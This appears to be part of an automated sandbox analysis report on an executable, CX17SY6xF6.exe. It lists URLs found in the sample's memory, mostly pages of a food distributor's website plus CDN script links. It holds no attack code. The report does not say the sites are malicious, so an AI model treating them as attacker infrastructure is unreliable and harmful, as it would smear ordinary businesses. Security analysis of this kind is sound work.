                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/catalog?view=class&#038;limit=200
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?offset=0&amp;limit=250&amp;col=class&amp;dir=ASC&amp;term
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizza
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=Mediterran
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=mexican
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/respond/1.4.2/respond.min.js
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parts.com-sit.com/de
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/cart/request-quote/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/about-300x298.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/woocommerce_uploads/logo-sdw6o6.gif
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#breadcrumb
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#primaryimage
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#website
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/?s=
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/Flyers
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/about/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/comments/feed/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/contact/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/employment-opportunities/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/feed/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/flyers/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/news/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/order/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/our-team/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/privacy-policy/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/service-area/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/vendors/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/LogoNEW-250x129.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/P-48x48.gif
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/P.gif
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/elementor/thumbs/facebook-512-q1jbn3nkxzlg1s7t64rdmt1lwqmyqc
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/elementor/thumbs/in-q1jbnt182ik6r96y1xqb04n1y55vi627ix9trmwf
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-1163123914b.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-516652802b.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-926365420b.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/monthlyspec.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/pohl-14.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F&#038;format=xml
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/wp/v2/pages/158
                  Source: CX17SY6xF6.exe, 00000000.00000003.649277876.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://s.rankmath.com/home
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://schema.org
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sekcija-simer.gzs.si/vsebina/O-sekciji-SiMER
                  Source: CX17SY6xF6.exe, 00000000.00000002.888204578.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707317121.0000000007E60000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585500794.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.589104954.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.588799215.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583968104.0000000003A00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sjbs.org/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css?ver=1.0.0
